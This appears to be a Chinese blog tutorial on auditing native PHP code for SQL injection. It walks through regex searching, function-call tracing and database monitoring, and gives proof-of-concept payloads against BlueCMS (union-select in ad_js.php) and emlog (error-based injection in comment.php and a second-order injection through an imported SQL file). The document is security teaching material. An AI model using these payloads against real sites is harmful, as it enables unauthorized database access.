代码审计-PHP原生开发篇&SQL注入&数据库监控&正则搜索&文件定位&静态分析

发布于:2024-04-05 ⋅ 阅读:(38) ⋅ 点赞:(0)

前言

挖掘技巧:
-语句监控-数据库SQL监控排查可利用语句定向分析
-功能追踪-功能点文件SQL执行代码函数调用链追踪
-正则搜索-(update|select|insert|delete|).?where.=

如何快速的在多个文件代码里面找脆弱:
1、看文件路径
2、看代码里面的变量(可控)
3、看变量前后的过滤

1、Bluecms-CNVD-1Day-常规注入审计分析

正则搜索关键词-快速定位漏洞点

(update|select|insert|delete|).*?where.*=

在这里插入图片描述
正则-ad_js.php->getone()->无过滤->有输出payload注入
在这里插入图片描述
在这里插入图片描述
Poc:

ad_js.php?ad_id=1 union select 1,2,3,4,5,6,database()

在这里插入图片描述
在这里插入图片描述

2、emlog-CNVD-1Day-常规注入审计分析

功能追踪-功能点文件SQL执行代码函数调用链追踪
审计流程:
comment.php->delCommentByIp($ip)->无过滤->构造触发
在这里插入图片描述
在这里插入图片描述

Poc:

/admin/comment.php?action=delbyip&ip=127.0.0.1%27and(extractvalue(1,concat(0x7e,(select%20user()),0x7e)))%20--+&token=11f3f9cb7e78e3f88e39ea5678939b7d

在这里插入图片描述

3、emlog-CNVD-1Day-2次注入审计分析

语句监控-数据库SQL监控排查可利用语句定向分析

审计流程:

数据库监控->user.php无可控->nickname->添加不可控->data.php可控->导出修改导入->触发二次注入

/admin/data.php
导入文件时执行SQL文件中语句,带入Payload

INSERT INTO emlog_user VALUES('110','','$P$BnTaZnToynOoAVP6T/MiTsZc9ZAQNg.',(select version()),'writer','n','','123@qq.com ' , '','','0','1687261845','1687261845');
/admin/user.php

在这里插入图片描述
在这里插入图片描述

select查询nickname条件数据,访问触发二次注入
在这里插入图片描述


网站公告

今日签到

点亮在社区的每一天
去签到